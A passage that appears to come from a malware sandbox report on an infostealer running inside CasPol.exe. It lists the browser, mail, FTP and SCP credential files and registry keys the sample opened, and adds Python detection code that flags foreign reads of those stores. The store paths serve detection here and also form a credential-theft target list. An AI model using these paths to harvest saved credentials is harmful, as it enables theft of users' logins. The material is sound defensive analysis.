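     "CommandLine": "CasPol.exe -m -lg", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", "GrantedAccess": "0x1400"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The command-line mismatch rule is the cheapest of the three and fires on the first CasPol.exe creation, before any memory is written; the access-mask rule needs Sysmon's ProcessAccess logging enabled for the .NET utilities, which is not on by default.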

Stealing of Sensitive Information

Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
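The file and registry accesses in this section are the credential stores of Chrome, Edge, Firefox, Thunderbird, Outlook, IncrediMail, WinSCP, FileZilla and SmartFTP, all read by CasPol.exe, which owns none of them. The example below is added here and is not code from the report or the sample. It keys each store path from the report to the program that legitimately opens it (the owner process names, and the IncrediMail executable name in particular, are this example's assumptions), flags any other reader, and counts distinct stores per process, since one process sweeping every store in seconds is the infostealer shape regardless of which signed binary it hides in. The access log is constructed from the report's lines; in production the rows would come from file-access auditing or an EDR's file and registry telemetry.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Credential stores the sample opened (paths and keys from the report), each with the
# program that legitimately reads it. Owner process names are this example's own list.
STORES: List[Tuple["re.Pattern[str]", str, Set[str]]] = [
    (re.compile(r"\\google\\chrome\\user data\\.*\\login data$"), "chrome", {"chrome.exe"}),
    (re.compile(r"\\microsoft\\edge\\user data\\.*\\login data$"), "edge", {"msedge.exe"}),
    (re.compile(r"\\mozilla\\firefox\\profiles\.ini$"), "firefox", {"firefox.exe"}),
    (re.compile(r"\\thunderbird\\profiles\.ini$"), "thunderbird", {"thunderbird.exe"}),
    (re.compile(r"\\filezilla\\recentservers\.xml$"), "filezilla", {"filezilla.exe"}),
    (re.compile(r"\\smartftp\\client 2\.0\\favorites\\"), "smartftp", {"smartftp.exe"}),
    (re.compile(r"^hkey_current_user\\software\\martin prikryl\\winscp 2\\sessions"), "winscp", {"winscp.exe"}),
    (re.compile(r"\\windows messaging subsystem\\profiles\\outlook\\"), "outlook", {"outlook.exe"}),
    (re.compile(r"\\microsoft\\office\\\d+\.\d+\\outlook\\profiles\\"), "outlook", {"outlook.exe"}),
    (re.compile(r"^hkey_current_user\\software\\incredimail\\identities"), "incredimail", {"incmail.exe"}),  # owner name assumed
]

Access = Tuple[str, str]   # (accessing process image, file path or registry key)


def classify(target: str) -> Optional[Tuple[str, Set[str]]]:
    """Map a file path or registry key to (store name, owning processes), or None if it is not a store."""
    t = target.lower()
    for pattern, store, owners in STORES:
        if pattern.search(t):
            return store, owners
    return None


def flag_foreign_access(events: List[Access]) -> List[Tuple[str, str, str]]:
    """Accesses to a credential store by anything other than its owning program."""
    flagged = []
    for process, target in events:
        hit = classify(target)
        if hit is None:
            continue
        store, owners = hit
        if process.rsplit("\\", 1)[-1].lower() not in owners:
            flagged.append((process, store, target))
    return flagged


def stores_per_process(events: List[Access]) -> Dict[str, Set[str]]:
    """Distinct stores each process touched; a process sweeping many of them is the infostealer shape."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for process, target in events:
        hit = classify(target)
        if hit is not None:
            seen[process.rsplit("\\", 1)[-1].lower()].add(hit[0])
    return dict(seen)


# Constructed access log reproducing the report's observations, plus two benign rows.
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
SAMPLE_LOG: List[Access] = [
    (CASPOL, r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (CASPOL, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    (CASPOL, r"HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    (CASPOL, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (CASPOL, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (CASPOL, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (CASPOL, r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (CASPOL, r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for process, store, target in flag_foreign_access(SAMPLE_LOG):
        reader = process.rsplit("\\", 1)[-1]
        print(f"{store:<12} read by {reader}: {target}")
    print({p: sorted(s) for p, s in stores_per_process(SAMPLE_LOG).items()})
```

Backup agents and search indexers will also trip the owner check on the browser databases, so the per-process store count is the better alerting key: a legitimate reader touches one vendor's files, while this sample touches mail, browser, FTP and SCP stores from a single .NET utility.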

Remote Access Functionality

Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR